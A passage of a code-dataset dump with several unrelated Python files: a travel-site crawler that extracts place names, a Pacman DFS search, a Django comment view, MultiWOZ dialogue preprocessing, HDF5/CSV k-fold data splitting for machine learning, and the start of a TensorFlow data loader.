self.html_parser.parse(new_url, html_content)\n self.url_manager.add_new_urls(new_urls)\n for data in new_datas.values():\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n # print(result)\n # print(len(data))\n # if len(data) > 4995*3:\n # data1 = data[:4995]\n # data2 = data[4995:]\n # f.write(data1 + '\\n')\n # f.write(data2 + '\\n')\n # print(data)\n f.write(data + '\\n')\n tmp = findPlacesNameEntity2.findByBoson(data)\n if len(tmp) != 0:\n result.extend(tmp)\n # print(result)\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n # print(result)\n # print(new_datas)\n # open('text.txt', encoding=)\n self.url_manager.old_urls.add(new_url)\n count += 1\n if count == 100:\n break\n except:\n print('crawl failed')\n result = findPlacesNameEntity2.getUniqueData(result)\n\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n print(result)\n\nif __name__ == '__main__':\n root_url = 'http://travel.kunming.cn/cykm/'\n spider = Spider()\n spider.craw(root_url)\n # result = findPlacesNameEntity2.findByLtp()\n # print(result)\n","sub_path":"test/spider/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"100885819","text":"pacman = list(map(int,input().split()))\nfood = list(map(int,input().split()))\nboard_size = list(map(int,input().split()))\nboard = [input() for _ in range(board_size[0])]\nvis = [[0 for _ in range(board_size[1])] for _ in range(board_size[0])]\ndx = [-1,0,0,1]\ndy = [0,-1,1,0]\nroad = [[pacman[0],pacman[1]]]\nans = []\ndef dfs(r,c,road):\n global ans\n if board[r][c]==\".\":\n if not ans or len(ans)>len(road):\n ans = road\n vis[r][c]=0\n return\n for i in range(4):\n if board[r+dx[i]][c+dy[i]]!=\"%\" and vis[r+dx[i]][c+dy[i]]!=1:\n vis[r+dx[i]][c+dy[i]]=1\n dfs(r+dx[i],c+dy[i],road + [[r+dx[i],c+dy[i]]])\n vis[r][c]=0\n return\ndfs(pacman[0],pacman[1],road)\nprint(len(ans))\nfor a in ans:\n print(a[0],a[1])\n","sub_path":"Artificial_Intelligence/A_search/Pacman_dfs.py","file_name":"Pacman_dfs.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106486977","text":"from django.shortcuts import render\nfrom review.models import Submit\n# Create your views here.\n#评论提交后的业务逻辑\ndef submit(request):\n #获取用户名\n username = request.session.get('username')\n #获取表单传的数据\n if request.method == 'POST':\n qq = request.POST.get('q')\n review = request.POST.get('r')\n try:\n model = Submit(username=username,qq=qq,review=review)\n model.save()\n except:\n print(\">>>>>\")\n print(\"connection failed\")\n #存储数据库中\n return render(request,'test.html',{'username':username})\n","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"436263707","text":"import json, os, re, copy, zipfile\nimport spacy\nimport ontology, utils\nfrom collections import OrderedDict\nfrom tqdm import tqdm\nfrom config import global_config as cfg\nfrom db_ops import MultiWozDB\nfrom clean_dataset import clean_slot_values, clean_text\n\n\ndef get_db_values(value_set_path):\n processed = {}\n bspn_word = []\n nlp = spacy.load('en_core_web_sm')\n\n with open(value_set_path, 'r', encoding='utf8') as f:\n value_set = json.loads(f.read().lower())\n\n with open('db/ontology.json', 'r', encoding='utf8') as f:\n otlg = json.loads(f.read().lower())\n\n for domain, slots in value_set.items():\n processed[domain] = {}\n bspn_word.append('['+domain+']')\n for slot, values in slots.items():\n s_p = ontology.normlize_slot_names.get(slot, slot)\n if s_p in ontology.informable_slots[domain]:\n bspn_word.append(s_p)\n processed[domain][s_p] = []\n\n for domain, slots in value_set.items():\n for slot, values in slots.items():\n s_p = ontology.normlize_slot_names.get(slot, slot)\n if s_p in ontology.informable_slots[domain]:\n for v in values:\n _, v_p = clean_slot_values(domain, slot, v)\n v_p = ' '.join([token.text for token in nlp(v_p)]).strip()\n processed[domain][s_p].append(v_p)\n for x in v_p.split():\n if x not in bspn_word:\n bspn_word.append(x)\n\n for domain_slot, values in otlg.items():\n domain, slot = domain_slot.split('-')\n if domain == 'bus':\n domain = 'taxi'\n if slot == 'price range':\n slot = 'pricerange'\n if slot == 'book stay':\n slot = 'stay'\n if slot == 'book day':\n slot = 'day'\n if slot == 'book people':\n slot = 'people'\n if slot == 'book time':\n slot = 'time'\n if slot == 'arrive by':\n slot = 'arrive'\n if slot == 'leave at':\n slot = 'leave'\n if slot == 'leaveat':\n slot = 'leave'\n if slot not in processed[domain]:\n processed[domain][slot] = []\n bspn_word.append(slot)\n for v in values:\n _, v_p = clean_slot_values(domain, slot, v)\n v_p = ' '.join([token.text for token in nlp(v_p)]).strip()\n if v_p not in processed[domain][slot]:\n processed[domain][slot].append(v_p)\n for x in v_p.split():\n if x not in bspn_word:\n bspn_word.append(x)\n\n with open(value_set_path.replace('.json', '_processed.json'), 'w', encoding='utf8') as f:\n json.dump(processed, f, indent=2, ensure_ascii=False)\n with open('data/multi-woz-processed/bspn_word_collection.json', 'w', encoding='utf8') as f:\n json.dump(bspn_word, f, indent=2, ensure_ascii=False)\n\n print('DB value set processed! ')\n\ndef preprocess_db(db_paths):\n dbs = {}\n nlp = spacy.load('en_core_web_sm')\n for domain in ontology.all_domains:\n with open(db_paths[domain], 'r', encoding='utf8') as f:\n dbs[domain] = json.loads(f.read().lower())\n for idx, entry in enumerate(dbs[domain]):\n new_entry = copy.deepcopy(entry)\n for key, value in entry.items():\n if type(value) is not str:\n continue\n del new_entry[key]\n key, value = clean_slot_values(domain, key, value)\n tokenize_and_back = ' '.join([token.text for token in nlp(value)]).strip()\n new_entry[key] = tokenize_and_back\n dbs[domain][idx] = new_entry\n with open(db_paths[domain].replace('.json', '_processed.json'), 'w', encoding='utf8') as f:\n json.dump(dbs[domain], f, indent=2, ensure_ascii=False)\n print('[%s] DB processed! '%domain)\n\n\nclass DataPreprocessor(object):\n def __init__(self):\n self.nlp = spacy.load('en_core_web_sm')\n self.db = MultiWozDB(cfg.dbs)\n data_path = 'data/multi-woz/viwoz_2k8_mapped_vi_states_cleaned_slots.json'\n archive = zipfile.ZipFile(data_path + '.zip', 'r')\n self.convlab_data = json.loads(archive.open(data_path.split('/')[-1], 'r').read().lower())\n self.delex_sg_valdict_path = 'data/multi-woz-processed/delex_single_valdict.json'\n self.delex_mt_valdict_path = 'data/multi-woz-processed/delex_multi_valdict.json'\n self.ambiguous_val_path = 'data/multi-woz-processed/ambiguous_values.json'\n self.delex_refs_path = 'data/multi-woz-processed/reference_no.json'\n self.delex_refs = json.loads(open(self.delex_refs_path, 'r', encoding='utf8').read())\n if not os.path.exists(self.delex_sg_valdict_path):\n self.delex_sg_valdict, self.delex_mt_valdict, self.ambiguous_vals = self.get_delex_valdict()\n # else:\n self.delex_sg_valdict = json.loads(open(self.delex_sg_valdict_path, 'r', encoding='utf8').read())\n self.delex_mt_valdict = json.loads(open(self.delex_mt_valdict_path, 'r', encoding='utf8').read())\n self.ambiguous_vals = json.loads(open(self.ambiguous_val_path, 'r', encoding='utf8').read())\n\n self.vocab = utils.Vocab(cfg.vocab_size)\n\n\n def delex_by_annotation(self, dial_turn):\n u = dial_turn['text'].split()\n span = dial_turn['span_info']\n for s in span:\n slot = s[1]\n if slot == 'open':\n continue\n if ontology.da_abbr_to_slot_name.get(slot):\n slot = ontology.da_abbr_to_slot_name[slot]\n for idx in range(s[3], s[4]+1):\n u[idx] = ''\n try:\n u[s[3]] = '[value_'+slot+']'\n except:\n u[5] = '[value_'+slot+']'\n u_delex = ' '.join([t for t in u if t is not ''])\n u_delex = u_delex.replace('[value_address] , [value_address] , [value_address]', '[value_address]')\n u_delex = u_delex.replace('[value_address] , [value_address]', '[value_address]')\n u_delex = u_delex.replace('[value_name] [value_name]', '[value_name]')\n u_delex = u_delex.replace('[value_name]([value_phone] )', '[value_name] ( [value_phone] )')\n return u_delex\n\n\n def delex_by_valdict(self, text):\n text = clean_text(text)\n\n text = re.sub(r'\\d{5}\\s?\\d{5,7}', '[value_phone]', text)\n text = re.sub(r'\\d[\\s-]stars?', '[value_stars]', text)\n text = re.sub(r'\\$\\d+|\\$?\\d+.?(\\d+)?\\s(pounds?|gbps?)', '[value_price]', text)\n text = re.sub(r'tr[\\d]{4}', '[value_id]', text)\n text = re.sub(r'([a-z]{1}[\\. ]?[a-z]{1}[\\. ]?\\d{1,2}[, ]+\\d{1}[\\. ]?[a-z]{1}[\\. ]?[a-z]{1}|[a-z]{2}\\d{2}[a-z]{2})', '[value_postcode]', text)\n\n for value, slot in self.delex_mt_valdict.items():\n text = text.replace(value, '[value_%s]'%slot)\n\n for value, slot in self.delex_sg_valdict.items():\n tokens = text.split()\n for idx, tk in enumerate(tokens):\n if tk == value:\n tokens[idx] = '[value_%s]'%slot\n text = ' '.join(tokens)\n\n for ambg_ent in self.ambiguous_vals:\n start_idx = text.find(' '+ambg_ent) # ely is a place, but appears in words like moderately\n if start_idx == -1:\n continue\n front_words = text[:start_idx].split()\n ent_type = 'time' if ':' in ambg_ent else 'place'\n\n for fw in front_words[::-1]:\n if fw in ['arrive', 'arrives', 'arrived', 'arriving', 'arrival', 'destination', 'there', 'reach', 'to', 'by', 'before']:\n slot = '[value_arrive]' if ent_type=='time' else '[value_destination]'\n text = re.sub(' '+ambg_ent, ' '+slot, text)\n elif fw in ['leave', 'leaves', 'leaving', 'depart', 'departs', 'departing', 'departure',\n 'from', 'after', 'pulls']:\n slot = '[value_leave]' if ent_type=='time' else '[value_departure]'\n text = re.sub(' '+ambg_ent, ' '+slot, text)\n\n text = text.replace('[value_car] [value_car]', '[value_car]')\n return text\n\n\n def get_delex_valdict(self, ):\n skip_entry_type = {\n 'taxi': ['taxi_phone'],\n 'police': ['id'],\n 'hospital': ['id'],\n 'hotel': ['id', 'location', 'internet', 'parking', 'takesbookings', 'stars', 'price', 'n', 'postcode', 'phone'],\n 'attraction': ['id', 'location', 'pricerange', 'price', 'openhours', 'postcode', 'phone'],\n 'train': ['price', 'id'],\n 'restaurant': ['id', 'location', 'introduction', 'signature', 'type', 'postcode', 'phone'],\n }\n entity_value_to_slot= {}\n ambiguous_entities = []\n for domain, db_data in self.db.dbs.items():\n print('Processing entity values in [%s]'%domain)\n if domain != 'taxi':\n for db_entry in db_data:\n for slot, value in db_entry.items():\n if slot not in skip_entry_type[domain]:\n if type(value) is not str:\n raise TypeError(\"value '%s' in domain '%s' should be rechecked\"%(slot, domain))\n else:\n slot, value = clean_slot_values(domain, slot, value)\n value = ' '.join([token.text for token in self.nlp(value)]).strip()\n if value in entity_value_to_slot and entity_value_to_slot[value] != slot:\n # print(value, \": \",entity_value_to_slot[value], slot)\n ambiguous_entities.append(value)\n entity_value_to_slot[value] = slot\n else: # taxi db specific\n db_entry = db_data[0]\n for slot, ent_list in db_entry.items():\n if slot not in skip_entry_type[domain]:\n for ent in ent_list:\n entity_value_to_slot[ent] = 'car'\n ambiguous_entities = set(ambiguous_entities)\n # ambiguous_entities.remove('cambridge')\n ambiguous_entities = list(ambiguous_entities)\n for amb_ent in ambiguous_entities: # departure or destination? arrive time or leave time?\n entity_value_to_slot.pop(amb_ent)\n entity_value_to_slot['parkside'] = 'address'\n entity_value_to_slot['parkside, cambridge'] = 'address'\n entity_value_to_slot['cambridge belfry'] = 'name'\n entity_value_to_slot['hills road'] = 'address'\n entity_value_to_slot['hills rd'] = 'address'\n entity_value_to_slot['Parkside Police Station'] = 'name'\n\n single_token_values = {}\n multi_token_values = {}\n for val, slt in entity_value_to_slot.items():\n if val in ['cambridge']:\n continue\n if len(val.split())>1:\n multi_token_values[val] = slt\n else:\n single_token_values[val] = slt\n\n with open(self.delex_sg_valdict_path, 'w', encoding='utf8') as f:\n single_token_values = OrderedDict(sorted(single_token_values.items(), key=lambda kv:len(kv[0]), reverse=True))\n json.dump(single_token_values, f, indent=2, ensure_ascii=False)\n print('single delex value dict saved!')\n with open(self.delex_mt_valdict_path, 'w', encoding='utf8') as f:\n multi_token_values = OrderedDict(sorted(multi_token_values.items(), key=lambda kv:len(kv[0]), reverse=True))\n json.dump(multi_token_values, f, indent=2, ensure_ascii=False)\n print('multi delex value dict saved!')\n with open(self.ambiguous_val_path, 'w', encoding='utf8') as f:\n json.dump(ambiguous_entities, f, indent=2, ensure_ascii=False)\n print('ambiguous value dict saved!')\n\n return single_token_values, multi_token_values, ambiguous_entities\n\n\n def preprocess_main(self, save_path=None, is_test=False):\n \"\"\"\n \"\"\"\n data = {}\n count=0\n self.unique_da = {}\n ordered_sysact_dict = {}\n for fn, raw_dial in tqdm(list(self.convlab_data.items())):\n count +=1\n # if count == 100:\n # break\n\n compressed_goal = {}\n dial_domains, dial_reqs = [], []\n for dom, g in raw_dial['goal'].items():\n if dom != 'topic' and dom != 'message' and g:\n if g.get('reqt'):\n for i, req_slot in enumerate(g['reqt']):\n if ontology.normlize_slot_names.get(req_slot):\n g['reqt'][i] = ontology.normlize_slot_names[req_slot]\n dial_reqs.append(g['reqt'][i])\n compressed_goal[dom] = g\n if dom in ontology.all_domains:\n dial_domains.append(dom)\n\n dial_reqs = list(set(dial_reqs))\n\n dial = {'goal': compressed_goal, 'log': []}\n single_turn = {}\n constraint_dict = OrderedDict()\n prev_constraint_dict = {}\n prev_turn_domain = ['general']\n ordered_sysact_dict[fn] = {}\n\n for turn_num, dial_turn in enumerate(raw_dial['log']):\n\n dial_state = dial_turn['metadata']\n if not dial_state: # user\n u = ' '.join(clean_text(dial_turn['text']).split())\n if dial_turn['span_info']:\n u_delex = clean_text(self.delex_by_annotation(dial_turn))\n else:\n u_delex = self.delex_by_valdict(dial_turn['text'])\n\n single_turn['user'] = u\n single_turn['user_delex'] = u_delex\n\n else: #system\n if dial_turn['span_info']:\n s_delex = clean_text(self.delex_by_annotation(dial_turn))\n else:\n if not dial_turn['text']:\n print(fn)\n s_delex = self.delex_by_valdict(dial_turn['text'])\n single_turn['resp'] = s_delex\n single_turn['resp_nodelex'] = ' '.join(clean_text(dial_turn['text']).split())\n\n # get belief state\n for domain in dial_domains:\n if not constraint_dict.get(domain):\n constraint_dict[domain] = OrderedDict()\n info_sv = dial_state[domain]['semi']\n for s,v in info_sv.items():\n s,v = clean_slot_values(domain, s,v)\n if len(v.split())>1:\n v = ' '.join([token.text for token in self.nlp(v)]).strip()\n if v != '':\n constraint_dict[domain][s] = v\n book_sv = dial_state[domain]['book']\n for s,v in book_sv.items():\n if s == 'booked':\n continue\n s,v = clean_slot_values(domain, s,v)\n if len(v.split())>1:\n v = ' '.join([token.text for token in self.nlp(v)]).strip()\n if v != '':\n constraint_dict[domain][s] = v\n\n constraints = []\n cons_delex = []\n turn_dom_bs = []\n for domain, info_slots in constraint_dict.items():\n if info_slots:\n constraints.append('['+domain+']')\n cons_delex.append('['+domain+']')\n for slot, value in info_slots.items():\n constraints.append(slot)\n constraints.extend(value.split())\n cons_delex.append(slot)\n if domain not in prev_constraint_dict:\n turn_dom_bs.append(domain)\n elif prev_constraint_dict[domain] != constraint_dict[domain]:\n turn_dom_bs.append(domain)\n\n\n sys_act_dict = {}\n turn_dom_da = set()\n for act in dial_turn['dialog_act']:\n d, a = act.split('-')\n turn_dom_da.add(d)\n turn_dom_da = list(turn_dom_da)\n if len(turn_dom_da) != 1 and 'general' in turn_dom_da:\n turn_dom_da.remove('general')\n if len(turn_dom_da) != 1 and 'booking' in turn_dom_da:\n turn_dom_da.remove('booking')\n\n # get turn domain\n turn_domain = turn_dom_bs\n for dom in turn_dom_da:\n if dom != 'booking' and dom not in turn_domain:\n turn_domain.append(dom)\n if not turn_domain:\n turn_domain = prev_turn_domain\n if len(turn_domain) == 2 and 'general' in turn_domain:\n turn_domain.remove('general')\n if len(turn_domain) == 2:\n if len(prev_turn_domain) == 1 and prev_turn_domain[0] == turn_domain[1]:\n turn_domain = turn_domain[::-1]\n\n # get system action\n for dom in turn_domain:\n sys_act_dict[dom] = {}\n add_to_last_collect = []\n booking_act_map = {'inform': 'offerbook', 'book': 'offerbooked'}\n for act, params in dial_turn['dialog_act'].items():\n if act == 'general-greet':\n continue\n d, a = act.split('-')\n if d == 'general' and d not in sys_act_dict:\n sys_act_dict[d] = {}\n if d == 'booking':\n d = turn_domain[0]\n a = booking_act_map.get(a, a)\n add_p = []\n for param in params:\n p = param[0]\n if p == 'none':\n continue\n elif ontology.da_abbr_to_slot_name.get(p):\n p = ontology.da_abbr_to_slot_name[p]\n if p not in add_p:\n add_p.append(p)\n add_to_last = True if a in ['request', 'reqmore', 'bye', 'offerbook'] else False\n if add_to_last:\n add_to_last_collect.append((d,a,add_p))\n else:\n sys_act_dict[d][a] = add_p\n for d, a, add_p in add_to_last_collect:\n sys_act_dict[d][a] = add_p\n\n for d in copy.copy(sys_act_dict):\n acts = sys_act_dict[d]\n if not acts:\n del sys_act_dict[d]\n if 'inform' in acts and 'offerbooked' in acts:\n for s in sys_act_dict[d]['inform']:\n sys_act_dict[d]['offerbooked'].append(s)\n del sys_act_dict[d]['inform']\n\n\n ordered_sysact_dict[fn][len(dial['log'])] = sys_act_dict\n\n sys_act = []\n if 'general-greet' in dial_turn['dialog_act']:\n sys_act.extend(['[general]', '[greet]'])\n for d, acts in sys_act_dict.items():\n sys_act += ['[' + d + ']']\n for a, slots in acts.items():\n self.unique_da[d+'-'+a] = 1\n sys_act += ['[' + a + ']']\n sys_act += slots\n\n\n # get db pointers\n matnums = self.db.get_match_num(constraint_dict)\n match_dom = turn_domain[0] if len(turn_domain) == 1 else turn_domain[1]\n match = matnums[match_dom]\n dbvec = self.db.addDBPointer(match_dom, match)\n bkvec = self.db.addBookingPointer(dial_turn['dialog_act'])\n\n single_turn['pointer'] = ','.join([str(d) for d in dbvec + bkvec])\n single_turn['match'] = str(match)\n single_turn['constraint'] = ' '.join(constraints)\n single_turn['cons_delex'] = ' '.join(cons_delex)\n single_turn['sys_act'] = ' '.join(sys_act)\n single_turn['turn_num'] = len(dial['log'])\n single_turn['turn_domain'] = ' '.join(['['+d+']' for d in turn_domain])\n\n prev_turn_domain = copy.deepcopy(turn_domain)\n prev_constraint_dict = copy.deepcopy(constraint_dict)\n\n if 'user' in single_turn:\n dial['log'].append(single_turn)\n for t in single_turn['user'].split() + single_turn['resp'].split() + constraints + sys_act:\n self.vocab.add_word(t)\n for t in single_turn['user_delex'].split():\n if '[' in t and ']' in t and not t.startswith('[') and not t.endswith(']'):\n single_turn['user_delex'].replace(t, t[t.index('['): t.index(']')+1])\n elif not self.vocab.has_word(t):\n self.vocab.add_word(t)\n\n single_turn = {}\n\n\n data[fn] = dial\n # pprint(dial)\n # if count == 20:\n # break\n self.vocab.construct()\n self.vocab.save_vocab('data/multi-woz-processed/vocab')\n with open('data/multi-woz-analysis/dialog_acts.json', 'w', encoding='utf8') as f:\n json.dump(ordered_sysact_dict, f, indent=2, ensure_ascii=False)\n with open('data/multi-woz-analysis/dialog_act_type.json', 'w', encoding='utf8') as f:\n json.dump(self.unique_da, f, indent=2, ensure_ascii=False)\n return data\n\n\nif __name__=='__main__':\n db_paths = {\n 'attraction': 'db/attraction_db.json',\n 'hospital': 'db/hospital_db.json',\n 'hotel': 'db/hotel_db.json',\n 'police': 'db/police_db.json',\n 'restaurant': 'db/restaurant_db.json',\n 'taxi': 'db/taxi_db.json',\n 'train': 'db/train_db.json',\n }\n get_db_values('db/value_set.json')\n preprocess_db(db_paths)\n dh = DataPreprocessor()\n data = dh.preprocess_main()\n if not os.path.exists('data/multi-woz-processed'):\n os.mkdir('data/multi-woz-processed')\n\n with open('data/multi-woz-processed/data_for_damd.json', 'w', encoding='utf8') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n\n","sub_path":"damd_multiwoz/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"626036657","text":"import numpy as np\nimport pandas as pd\nimport csv\nimport h5py\nimport os\nfrom sklearn import model_selection\nfrom sklearn.model_selection import KFold\n\n\"\"\"\nThis script can be utilized to split a dataset into a train/validation set and subsequently split the train file into 5-fold cross validation.\nRequires the python libraries http://www.h5py.org/ and http://scikit-learn.org/stable/ to be installed on the system.\n\"\"\"\n\ndef read_csv(ifile):\n\t\"\"\"Reads csv into numpy arrays:\n\tcsv has to be in format: CID,SMILE,Activity label,features\"\"\"\n\tprint(\"Now working on file{}\".format(ifile))\n\treader = csv.reader(open(ifile, \"rt\"), delimiter=',')\n\theaders = next(reader)\n\treader = pd.read_csv(ifile)\n\tlabels = reader['Activity']\n\tfeatures = reader.iloc[:, 3:]\n\tlabels = np.array(labels, dtype=float)\n\tfeatures = np.array(features, dtype=float)\n\tprint(\"Number of instances: \", len(labels))\n\tprint(\"Number of features\", len(features[0]))\n\tprint()\n\tprint(\"Done reading csv file\")\n\tprint()\n\treturn labels, features\n\n\ndef TrainTest_Validation(labels,features):\n\t\"Splits train-test and validation dataset: 80% is used for training-testing (5Fold Cross Validation) and 20% is kept outside for model validation\"\n\tprint(\"Now splitting to test and validation sets\")\n\ttrain_labels, test_labels, train_features, test_features = model_selection.train_test_split(labels, features, test_size=0.20, random_state=0)\n\tprint(len(train_labels))\n\tprint(len(test_labels))\n\tprint(\"Done\")\n\treturn train_labels, test_labels, train_features, test_features\n\n\ndef Kfold(train_labels, train_features):\n\t\"Splits training dataset in 5 fold cross validation pair sets train1/test1, train2/test2 etc\"\n\tsss = KFold(n_splits=5, shuffle=True, random_state=0)\n\tprint(len(train_labels))\n\treturn sss\n\n\ndef write_TrainSet(fileName, train_labels, train_features):\n\t\"\"\"\n\tWrites the complete training dataset to file\n\t\"\"\"\n\tprint(len(train_labels))\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Train set/lipinski_train_test/\")\n\tHDF5file = fileName+\".h5\"\n\tCSVfile = fileName+\".csv\"\n\tprint(\"Now writing train set\")\n\tprint(HDF5file)\n\tprint(CSVfile)\n\twriterTrain = csv.writer(open(CSVfile, \"wt\", newline=''), delimiter=',')\n\twith h5py.File(HDF5file, 'w') as f:\n\t\tf['HDF5Data2'] = train_labels.astype(np.float32)\n\t\tf['HDF5Data1'] = train_features.astype(np.float32)\n\n\tfor j in range(len(train_labels)):\n\t\ttemp=[]\n\t\ttemp.append(int(train_labels[j]))\n\t\tfor x in range(len(train_features[j])):\n\t\t\ttemp.append(float(train_features[j][x]))\n\n\t\twriterTrain.writerow(temp)\n\treturn\n\n\n\ndef write_Validation(fileName, test_labels, test_features):\n\t\"\"\"\n\tWrites the validation set to file\n\t\"\"\"\n\tprint(len(test_labels))\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Validation/lipinski/\")\n\tHDF5file = fileName+\".h5\"\n\tCSVfile = fileName+\".csv\"\n\tprint(\"Now writing test set\")\n\tprint(HDF5file)\n\tprint(CSVfile)\n\twriterValidation = csv.writer(open(CSVfile, \"wt\", newline=''), delimiter=',')\n\twith h5py.File(HDF5file, 'w') as f:\n\t\tf['HDF5Data1'] = test_features.astype(np.float32)\n\t\tf['HDF5Data2'] = test_labels.astype(np.float32)\n\n\tfor j in range(len(test_labels)):\n\t\ttemp = []\n\t\ttemp.append(int(test_labels[j]))\n\t\tfor x in range(len(test_features[j])):\n\t\t\ttemp.append(float(test_features[j][x]))\n\n\t\twriterValidation.writerow(temp)\n\treturn\n\n\ndef write_files(sss, labels, features):\n\tos.chdir(\"E:/My Coding/Scripts/Path to/Train_Test/lipinski/\")\n\tcount = 0\n\tfor train_index, test_index in sss.split(train_labels):\n\t\tprint()\n\t\tcount += 1\n\t\tprint(\"Fold: \", count)\n\t\t#==================\n\t\t#Writes outputfiles to csv files\n\t\tTrain = \"train_\"+str(count)\n\t\tCsvTrain = Train+\".csv\"\n\t\tH5Train = Train+\".h5\"\n\t\tTest = \"test_\"+str(count)\n\t\tCsvTest = Test+\".csv\"\n\t\tH5Test = Test+\".h5\"\n\t\ty_train = labels[train_index] #train labels\n\t\ty_test = labels[test_index] #test labels\n\t\tx_train = features[train_index] #train features\n\t\tx_test = features[test_index] #test features\n\t\twriterTrain = csv.writer(open(CsvTrain, \"wt\", newline=''), delimiter=',')\n\t\twriterTest = csv.writer(open(CsvTest, \"wt\", newline=''), delimiter=',')\n\t\tprint(\"Number of training instances \", len(x_train))\n\t\tprint(\"Number of test instances \", len(x_test))\n\t\tprint()\n\t\tprint(\"Now writing to \", CsvTrain, H5Train)\n\t\twith h5py.File(H5Train, 'w') as f:\n\t\t\tf['HDF5Data1'] = x_train.astype(np.float32)\n\t\t\tf['HDF5Data2'] = y_train.astype(np.float32)\n\t\twith h5py.File(H5Test, 'w') as f:\n\t\t\tf['HDF5Data1'] = x_test.astype(np.float32)\n\t\t\tf['HDF5Data2'] = y_test.astype(np.float32)\n\t\tfor j in range(len(y_train)):\n\n\t\t\ttemp = []\n\t\t\ttemp.append(int(y_train[j]))\n\t\t\tfor x in range(len(x_train[j])):\n\t\t\t\ttemp.append(float(x_train[j][x]))\n\n\t\t\twriterTrain.writerow(temp)\n\n\t\tprint()\n\t\tprint(\"Now writing to \", CsvTest)\n\n\t\tfor j in range(len(y_test)):\n\t\t\ttemp = []\n\t\t\ttemp.append(int(y_test[j]))\n\t\t\tfor x in range(len(x_test[j])):\n\t\t\t\ttemp.append(float(x_test[j][x]))\n\n\t\t\twriterTest.writerow(temp)\n\n\n\t\t#======================\n\t\t#Writes outputfiles to hd5 files\n\t\tTrain=\"train_\"+str(count)\n\t\tCsvTrain=Train+\".csv\"\n\t\tTest=\"test_\"+str(count)\n\t\tCsvTest=Test+\".csv\"\n\treturn\n\n\n\nif __name__ == '__main__':\n\tlabels, features = read_csv(\"E:/My Coding/Scripts/Path to/Train set/lipinski_ecfp/lipinski_ecfp6_1024.csv\")\n\ttrain_labels, test_labels, train_features, test_features = TrainTest_Validation(labels, features)\n\twrite_Validation(\"validation\", test_labels, test_features)\n\twrite_TrainSet(\"train_test\", train_labels, train_features)\n\tsss = Kfold(train_labels, train_features)\n\twrite_files(sss, train_labels, train_features)\n","sub_path":"PrepareDataToHDF5.py","file_name":"PrepareDataToHDF5.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347812079","text":"import pandas as pd\nimport sys\nimport csv\nfrom sklearn.utils import shuffle\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\ndata = pd.read_csv('clus_training_tj.csv')\n\ndf = pd.DataFrame(data)\n\n\n########################################\n## y=abs(3.2-4.9) data set -- 50% b/s ##\n########################################\n\ndf1 = df[df['y'].abs() >= 3.2]\n\nsort1 = df1.sort_values('background/signal')\ncount = sort1['background/signal'].value_counts().tolist()\na = count[0] - count[1]\n\nsort2 = sort1[a:]\nsort2 = shuffle(sort2)\n\ndfa = sort2.drop(['y'], axis=1)\n\ndfa.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_4.9_3.2.csv', encoding='utf-8', index=False)\n\ndf2 = df[df['y'].abs() <= 3.2]\n\n########################################\n## y=abs(2.5-3.2) data set -- 50% b/s ##\n########################################\n\ndf3 = df2[df2['y'].abs() >= 2.5]\n\nsort3 = df3.sort_values('background/signal')\ncount1 = sort3['background/signal'].value_counts().tolist()\nb = count1[0] - count1[1]\n\nsort4 = sort3[b:]\nsort4 = shuffle(sort4)\n\ndfb = sort4.drop(['y'], axis=1)\n\ndfb.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_3.2_2.5.csv', encoding='utf-8', index=False)\n\ndf4 = df2[df2['y'].abs() <= 2.5]\n\n########################################\n## y=abs(1.5-2.5) data set -- 50% b/s ##\n########################################\n\ndf5 = df4[df4['y'].abs() >= 1.5]\n\nsort5 = df5.sort_values('background/signal')\ncount2 = sort5['background/signal'].value_counts().tolist()\nc = count2[0] - count2[1]\n\nsort6 = sort5[c:]\nsort6 = shuffle(sort6)\n\ndfc = sort6.drop(['y'], axis=1)\n\ndfc.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_2.5_1.5.csv', encoding='utf-8', index=False)\n\n\n######################################\n## y=abs(0-1.5) data set -- 50% b/s ##\n######################################\n\ndf6 = df4[df4['y'].abs() <= 1.5]\n\nsort7 = df5.sort_values('background/signal')\ncount3 = sort7['background/signal'].value_counts().tolist()\nd = count3[0] - count3[1]\n\nsort8 = sort7[d:]\nsort8 = shuffle(sort8)\n\ndfd = sort8.drop(['y'], axis=1)\n\ndfd.to_csv('/Users/Anne-Katherine/Desktop/ATLAS_ML/clus_tj_training_0_1.5.csv', encoding='utf-8', index=False)\n\n\n","sub_path":"config_towtj_training.py","file_name":"config_towtj_training.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"90619839","text":"import tensorflow as tf\nimport numpy as np\n\nx_data_array = []\n\nfp = open(\"./train_datas/features.csv\", 'r')\ntmp_x = fp.readlines()\nfp.close()\n\nfor i in tmp_x:\n features_data = i.split(',')\n features_array = []\n \n for k in range(6):\n features_array.append(float(features_data[k]))\n\n x_data_array.append(features_array)\n\ndel(tmp_x)\n\ny_data_array = []\n\nfp = open(\"./train_datas/labels.csv\")\ntmp_y = fp.readlines()\nfp.close()\n\nfor i in tmp_y:\n labels_data = i.split(',')\n labels_array = []\n \n for k in range(7):\n labels_array.append(float(labels_data[k]))\n \n y_data_array.append(labels_array)\n\ndel(tmp_y)\n\nx_data = np.array(x_data_array)\ny_data = 